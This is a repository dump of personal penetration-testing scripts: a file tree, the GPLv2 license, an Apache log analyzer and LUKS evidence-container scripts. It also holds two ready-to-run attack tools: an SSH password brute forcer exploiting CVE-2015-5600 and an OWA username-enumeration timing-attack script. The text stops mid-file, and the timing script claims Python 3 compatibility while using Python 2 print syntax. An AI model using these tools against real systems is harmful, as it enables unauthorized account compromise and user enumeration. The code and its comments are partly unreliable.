├── .gitattributes ├── .gitignore ├── LICENSE ├── README.md ├── auxillary ├── apache_log_details.sh ├── brute_forcer │ └── ssh │ │ └── kdb_interative_CVE-2015-5600_bruteforce.sh ├── evidence_management │ └── luks_container │ │ ├── close_container.sh │ │ ├── create_container.sh │ │ └── open_container.sh ├── http │ └── http_timing_attack.py ├── log_analyzers │ └── apache_log_details.sh ├── proxies │ └── simple_http_proxy.py └── pyinstaller-exe-compile.sh ├── enumeration ├── banner-grabber.py ├── dns │ └── zone-transfer.sh ├── fully-detailed-nmap-scan.sh ├── osint │ └── org2linkedin │ │ ├── README.md │ │ ├── config.exmpl.cfg │ │ └── org2linkedin.py ├── shodan │ ├── shodan_dns_resolve.sh │ ├── shodan_dns_reverse.sh │ ├── shodan_ip_info.sh │ ├── shodan_ip_scan.sh │ ├── shodan_labs_honeyscore.sh │ ├── shodan_sysinfo_account_profile.sh │ ├── shodan_sysinfo_api-info.sh │ ├── shodan_sysinfo_profile-info.sh │ ├── shodan_sysinfo_scanstatus.sh │ ├── shodan_sysinfo_tools-myip.sh │ ├── shodan_sysinfo_what-ports.sh │ ├── shodan_sysinfo_what-protocols.sh │ └── shodan_sysinfo_what-services.sh ├── smb │ └── smb_enum.sh ├── smtp │ ├── namelist │ ├── vrfy_enum.py │ └── vrfy_wrapper.sh ├── snmp │ └── snmp_checker.sh └── ssl │ └── ssl_cert_details.py ├── exploit-development ├── auxillary │ ├── host_pwnable.sh │ ├── pattern.py │ └── shellcode_to_hex.sh ├── fuzzers │ └── network_service_fuzzer.py ├── obfuscators │ └── vba_str_to_chr │ │ ├── chr_table.txt │ │ └── conv_str.sh ├── tcp_exploit_skeleton.py ├── udp_exploit_skeleton.py └── win32 │ ├── binders │ └── poor_mans_binder.py │ └── buffer-overflows │ └── win32-buffer-overflow-development-and-exploitation-skeleton.py ├── exploit └── web │ └── heartbleed-tester.py ├── file-transfers └── ftp │ └── small_ftp_server.py └── post-exploit └── linux └── find_bitcoin_addresses.sh /.gitattributes: -------------------------------------------------------------------------------- 1 | * text=auto eol=lf 2 | 
-------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | enumeration/shodan/SHODAN_API_KEY 2 | enumeration/osint/org2linkedin/config.cfg 3 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc., 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Lesser General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 
30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. 
The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 
97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 
128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. (This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. 
However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. 
Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. 
Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. 
For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 
279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 292 | 293 | {description} 294 | Copyright (C) {year} {fullname} 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 305 | 306 | You should have received a copy of the GNU General Public License along 307 | with this program; if not, write to the Free Software Foundation, Inc., 308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 309 | 310 | Also add information on how to contact you by electronic and paper mail. 311 | 312 | If the program is interactive, make it output a short notice like this 313 | when it starts in an interactive mode: 314 | 315 | Gnomovision version 69, Copyright (C) year name of author 316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 317 | This is free software, and you are welcome to redistribute it 318 | under certain conditions; type `show c' for details. 
319 | 320 | The hypothetical commands `show w' and `show c' should show the appropriate 321 | parts of the General Public License. Of course, the commands you use may 322 | be called something other than `show w' and `show c'; they could even be 323 | mouse-clicks or menu items--whatever suits your program. 324 | 325 | You should also get your employer (if you work as a programmer) or your 326 | school, if any, to sign a "copyright disclaimer" for the program, if 327 | necessary. Here is a sample; alter the names: 328 | 329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 330 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 331 | 332 | {signature of Ty Coon}, 1 April 1989 333 | Ty Coon, President of Vice 334 | 335 | This General Public License does not permit incorporating your program into 336 | proprietary programs. If your program is a subroutine library, you may 337 | consider it more useful to permit linking proprietary applications with the 338 | library. If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. 340 | 341 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # security-scripts 2 | Small, one-off scripts for security related stuff I've written over time 3 | -------------------------------------------------------------------------------- /auxillary/apache_log_details.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Menu-driven collection from an apache access.log file 3 | # USAGE: 4 | # $0 /path/to/access.log 5 | # $0 6 | 7 | if [ -z "$1" ]; then 8 | read -p "Provide the path to your access.log: " access_log 9 | if [ ! -f $access_log ]; then 10 | echo "File not found!" 11 | exit 1 12 | fi 13 | else [ ! 
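-f "$1" ] && { echo "File not found!"; exit 2; }
    # Only reached with an existing path.  The original `else [ ! -f $1 ]; echo ...; exit 2`
    # ran the test as a plain command, then printed "File not found!" and exited 2
    # unconditionally, and never assigned access_log from $1.
    access_log="$1"
fi

echo -e "Connections made:\n"
# Field 1 of a common/combined log line is the client address.
cut -d " " -f 1 "$access_log" | sort | uniq -c | sort -urn
echo -e "\nPlease wait, this next part can take a bit...\n"
echo -e "Finding files by access\n"
# Exact match on the address field; a plain grep treated "." as a wildcard and
# let 10.0.0.1 also match 10.0.0.10 or 110.0.0.1.  Sorting before uniq -c is
# what makes the per-request counts correct (uniq only merges adjacent lines).
for ip in $(cut -d " " -f 1 "$access_log" | sort | uniq -c | sort -urn | awk '{print $2}'); do
    awk -v ip="$ip" '$1 == ip' "$access_log" | cut -d "\"" -f 2 | sort | uniq -c
done | sort -u

echo "Provide what you wish to investigate further: "
options=("Specific Address" "Specific file accessed by specific ip address" "Exit")
select inv_menu in "${options[@]}"; do
    case $inv_menu in
        "Specific Address" )
            read -r -p "Provide the IP address: " inv_address
            echo -e "Pages accessed by $inv_address by count:\n"
            # -F -w: literal, whole-word match of whatever the user typed.
            grep -F -w -- "$inv_address" "$access_log" | cut -d "\"" -f 2 | sort | uniq -c;;
        "Specific file accessed by specific ip address" )
            if [ -z "$inv_address" ]; then
                echo -e "INFO: No IP address cached\n"
                read -r -p "Provide the IP address: " inv_address
            else
                read -r -p "Want to use $inv_address as the IP address? (y/n)" yn
                case $yn in
                    [Yy]* ) ;;
                    # Read into inv_address itself; the original `read ... $inv_address`
                    # expanded the current value and read into a variable of that name.
                    [Nn]* ) read -r -p "Provide the IP address: " inv_address;;
                    * ) echo "Please answer yes or no." ;;
                esac
            fi
            read -r -p "Provide all or part of the file name you want to see requests for: " http_file
            echo -e "Unique requests for $inv_address on $http_file\n"
            if [ -z "$http_file" ]; then
                echo -e "WARNING! No file name provided!"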
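else
                # The heading says "on $http_file" but the original never filtered on
                # it here; add the literal (-F) file filter to both listings.
                grep -F -w -- "$inv_address" "$access_log" | grep -F -- "$http_file" | cut -d "\"" -f 2 | sort | uniq -c
                echo -e "Number of response codes for $inv_address on $http_file\n"
                # Field 9 of a common/combined log line is the HTTP status code.
                grep -F -w -- "$inv_address" "$access_log" | grep -F -- "$http_file" | awk '{print $9}' | sort | uniq -c
                read -r -p "Provide response code to read from, else 'return' " inv_rescode
                if [[ $inv_rescode == "return" ]]; then
                    echo "INFO: Returning"
                elif [[ $inv_rescode == "Exit" || $inv_rescode == "exit" || $inv_rescode == "Quit" || $inv_rescode == "quit" ]]; then
                    exit 0
                elif [ -n "$inv_rescode" ]; then
                    echo -e "$inv_rescode requests by $inv_address:\n"
                    # Compare the status field exactly; a plain `grep 200` would also hit
                    # byte counts, paths and timestamps containing that substring.
                    grep -F -w -- "$inv_address" "$access_log" | grep -F -- "$http_file" | awk -v code="$inv_rescode" '$9 == code'
                else
                    echo -e "All requests by $inv_address\n"
                    grep -F -w -- "$inv_address" "$access_log" | grep -F -- "$http_file"
                fi
            fi;;
        "Exit" )
            echo "Exiting..."
            exit 0;;
        *) echo "Select from the menu";;
    esac
done
-------------------------------------------------------------------------------- /auxillary/brute_forcer/ssh/kdb_interative_CVE-2015-5600_bruteforce.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Credit to Kingcope
# Brute forcer for CVE-2015-5600: a long KbdInteractiveDevices list lets a
# client keep retrying a password past MaxAuthTries within LoginGraceTime.
# Reads one password per line from stdin.  Only use against hosts you are
# authorised to test.

USAGE="USAGE: cat wordlist.txt | $0 <user> <host>"

# -z instead of comparing against the never-defined $NULL.
if [[ -z "$1" ]]; then
    echo "$USAGE"
    exit 1
elif [[ -z "$2" ]]; then
    echo "$USAGE"
    exit 2
else
    echo "Starting..."
fi

# Stop at end of the wordlist.  The original `while true` + `read` kept
# retrying an empty password forever once stdin was exhausted.
while IFS= read -r password
do
    # Pass the password through the SSHPASS environment variable (-e) instead
    # of -p, so it is not visible in `ps` to every other user on this host.
    # ssh -n keeps ssh from reading the rest of the wordlist off stdin.
    # NOTE(review): an unknown host key will still make sshpass fail; add the
    # key to known_hosts first.
    SSHPASS="$password" sshpass -e ssh -n -l "$1" -oKbdInteractiveDevices="$(perl -e 'print "pam," x10000')" "$2"
    rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi
    echo "Respawn due to login grace time..."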
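done
-------------------------------------------------------------------------------- /auxillary/evidence_management/luks_container/close_container.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Unmounts and closes the LUKS volume recorded by open_container.sh, removes
# its mount point and shreds the state file.

if [[ $EUID -ne 0 ]]; then
    echo "This must be run as root"
    exit 1
fi

state_file=/tmp/.lukscryptinfo

# SECURITY: the state file lives in world-writable /tmp and was previously
# `source`d as root, so any local user who planted /tmp/.lukscryptinfo first
# could run arbitrary commands as root when the operator closed the
# container.  Extract the one value we need instead of executing the file,
# and accept only a plain volume name (no "/", not "." or "..").
if [ -L "$state_file" ] || [ ! -f "$state_file" ]; then
    echo "$state_file missing or is a symlink; nothing to close"
    exit 1
fi
volume_name=$(sed -n 's/^volume_name=//p' "$state_file" | head -n 1)
if [[ ! "$volume_name" =~ ^[A-Za-z0-9_][A-Za-z0-9._-]*$ ]]; then
    echo "Refusing to act on invalid volume name in $state_file"
    exit 1
fi
# NOTE(review): a root-only directory such as /run would remove the shared
# /tmp problem entirely, but the path must change in open_container.sh too.

umount "/mnt/$volume_name"
cryptsetup luksClose "$volume_name"
# The original `if [ ! -z "$volume_name" ] then` was missing the ';' before
# `then` and did not parse; the name is validated above, so rmdir directly.
rmdir "/mnt/$volume_name"
shred -z -n 5 -u -f "$state_file"
-------------------------------------------------------------------------------- /auxillary/evidence_management/luks_container/create_container.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Creates an encrypted LUKS container file and formats it with ext4.

if [[ $EUID -ne 0 ]]; then
    echo "This script must be run as root"
    exit 1
fi

read -r -p "What size should the container be in MB? (512): " container_size
# Apply the default the prompt advertises; the original passed an empty
# count= to dd when the operator just pressed Enter.
container_size=${container_size:-512}
if [[ ! "$container_size" =~ ^[0-9]+$ ]]; then
    echo "Size must be a whole number of MB"
    exit 1
fi
read -r -p "Where should we store the container? 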
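(/root/container): " container_path
container_path=${container_path:-/root/container}
# Evidence container: never clobber a file that already exists.
if [ -e "$container_path" ]; then
    echo "Refusing to overwrite existing file: $container_path"
    exit 1
fi
# Fill with random data so unused space is indistinguishable from ciphertext.
dd if=/dev/urandom of="$container_path" bs=1M count="$container_size" || exit 1
chmod 600 "$container_path"

cryptsetup -y luksFormat "$container_path" || exit 1
cryptsetup luksOpen "$container_path" somerndvolume || exit 1

mkfs.ext4 -j /dev/mapper/somerndvolume
echo "Container is formatted with ext4"

cryptsetup luksClose somerndvolume
-------------------------------------------------------------------------------- /auxillary/evidence_management/luks_container/open_container.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Opens a LUKS container file, mounts it under /mnt/<volume_name> and records
# the volume name for close_container.sh.
# USAGE: open_container.sh -f <container_path> -n <volume_name>

if [[ $EUID -ne 0 ]]; then
    echo "This script must be run as root"
    exit 1
fi

usage() {
    echo "USAGE: $0 -f <container_path> -n <volume_name>"
}

if [[ $# -eq 0 ]]; then
    usage
    exit 1
fi

while [[ $# -gt 1 ]]; do
    key="$1"
    case $key in
        -f)
            container_path="$2"
            shift;;
        -n)
            volume_name="$2"
            shift;;
        *)
            usage
            exit 1;;
    esac
    shift
done

# Both options are required; with either missing the original went on to run
# luksOpen/mount with empty arguments and still wrote the state file.
if [ -z "$container_path" ] || [ -z "$volume_name" ]; then
    usage
    exit 1
fi
if [ ! -f "$container_path" ]; then
    echo "Container not found: $container_path"
    exit 1
fi
# The volume name becomes a device-mapper name, a path under /mnt and a line
# in the state file, so allow only a plain name (no "/", not "." or "..").
if [[ ! "$volume_name" =~ ^[A-Za-z0-9_][A-Za-z0-9._-]*$ ]]; then
    echo "Invalid volume name: $volume_name"
    exit 1
fi

mount_point="/mnt/$volume_name"
cryptsetup luksOpen "$container_path" "$volume_name" || exit 1
mkdir -p "$mount_point"
if ! mount "/dev/mapper/$volume_name" "$mount_point"; then
    echo "mount failed; closing $volume_name again"
    cryptsetup luksClose "$volume_name"
    rmdir "$mount_point"
    exit 1
fi

state_file=/tmp/.lukscryptinfo
# SECURITY: /tmp is world-writable and close_container.sh reads this file as
# root.  Remove whatever is there (a planted file or symlink) and create the
# record with noclobber (O_EXCL) and mode 0600 so nobody else can supply its
# contents.  A small race remains between rm and create; a root-only
# directory such as /run would close it, but the path must change in
# close_container.sh in step.
rm -f "$state_file"
if ! ( umask 077 && set -o noclobber && echo "volume_name=$volume_name" > "$state_file" ); then
    echo "Could not write $state_file; close with: umount $mount_point && cryptsetup luksClose $volume_name"
    exit 1
fi
echo "Volume has been mounted at $mount_point"
-------------------------------------------------------------------------------- /auxillary/http/http_timing_attack.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# Multiprocessed HTTP Timing attack tester
# MAKE SURE YOU READ THE INSTRUCTIONS CAREFULLY
# I just pull the request out of burpsuite using the "Copy as Python-Requests" extension
# Und3rf10w
#
# Classification is purely by --timeout: a value whose request completes in
# time is reported as a hit, one that times out is not.  Calibrate --timeout
# against a known-valid and a known-invalid value before trusting results.

import argparse
import itertools
import threading
import time
from multiprocessing import Pool, freeze_support
from sys import argv, exc_info

import requests

parser = 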
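argparse.ArgumentParser(prog=str(argv[0]), usage='%(prog)s [options]', description='Utility to perform timing attacks against HTTP services such as OWA')
parser.add_argument('-t', "--timeout", type=int, help="Number of seconds to wait before timing out on request", required=False, default=5)
parser.add_argument('-T', "--threads", type=int, help="Number of threads to use", required=False, default=1)
parser.add_argument('-f', "--filepath", type=str, help="Path to file containing values to fuzz", required=True)
parser.add_argument('-o', "--outfile", type=str, help="Path of file to write results to", required=False, default=None)
parser.add_argument('-d', "--debug", help="Show debugging info (implies --verbose)", required=False, default=False, action='store_true')
parser.add_argument('-v', "--verbose", help="Show verbose output", required=False, default=False, action='store_true')

args = parser.parse_args()

timeoutval = args.timeout
threads = args.threads
filepath = args.filepath
outfile = args.outfile
debug = args.debug
verbose = args.verbose

if debug:
    verbose = True


def main():
    """Fan the fuzz values out over a process pool, one postreq() call per value."""
    values = assign_file_to_list(filepath)
    pool = Pool(threads)
    print("Press CTRL + \\ if you need to exit")
    # zip rather than itertools.izip so the script runs under Python 2 and 3.
    pool.map(postreq_wrapper, zip(values, itertools.repeat(timeoutval), itertools.repeat(outfile)))
    pool.close()
    pool.join()


def assign_file_to_list(filepath):
    """Read one fuzz value per line from *filepath*, sorted.

    The list is returned and also published as the module global ``fuzzvals``
    for callers that still read the global.
    """
    global fuzzvals
    with open(filepath, "r") as f:
        # rstrip("\r\n") also copes with CRLF wordlists; strip("\n") left the "\r" in.
        fuzzvals = [line.rstrip("\r\n") for line in sorted(f)]
    return fuzzvals


def postreq_wrapper(args):
    """Pool.map() passes a single argument; unpack the (fuzzval, timeout, outfile) tuple."""
    return postreq(*args)


def postreq(fuzzval, timeoutval, outfile):
    """Send one probe request for *fuzzval*; it counts as a hit if it completes within *timeoutval*."""
    try:
        if debug:
            print("DEBUG: current fuzzval %s" % str(fuzzval))
        start_time = time.time()
        # requests pulled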
from burpsuite extension: Copy as Python-Requests 62 | # ensure that you add timeout=timeoutval before the last ')' and after the last '}' in your request 63 | # REPLACE THE FOLLOWING LINE, NOTING THE LOCATION OF 'str(fuzzval)' AND 'timeout=timeoutval' 64 | r = requests.post("https://mail.example.com:443/owa/auth.owa", headers={"User-Agent": "Mozilla/5.0 legit user agent", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Cookie": "ClientId=XXXXXXXXXXXXXXX; PrivateComputer=true", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}, data={"destination": "https://mail.example.com/owa/", "flags": "4", "forcedownlevel": "0", "username": str(fuzzval), "password": "itdoesntevenmatter", "passwordText": "", "isUtf8": "1"}, timeout=timeoutval) 65 | if verbose == True: 66 | print "INFO: Value %s succeded" % str(fuzzval) 67 | if debug == True: 68 | print "DEBUG: %s seconds for this request to complete" % (time.time() - start_time ) 69 | print "DEBUG: Request returned %d" % r.status_code 70 | if outfile != None: 71 | o = open(outfile, "a") 72 | o.write(fuzzval + '\n') 73 | o.close() 74 | else: 75 | print "%s" % fuzzval 76 | except requests.exceptions.ReadTimeout: 77 | if verbose == True: 78 | print "INFO: Value %s didn't work because the request timed out" % str(fuzzval) 79 | pass 80 | except: 81 | print "ERROR: An unhandled exception was raised, skipping test for value: %s" % str(fuzzval) 82 | print exc_info()[0] 83 | pass 84 | 85 | 86 | if __name__=="__main__": 87 | freeze_support() 88 | main() 89 | 90 | -------------------------------------------------------------------------------- /auxillary/log_analyzers/apache_log_details.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Menu-driven collection from an apache access.log file 3 | # USAGE: 4 | # $0 /path/to/access.log 5 | # $0 6 | 7 | if [ 
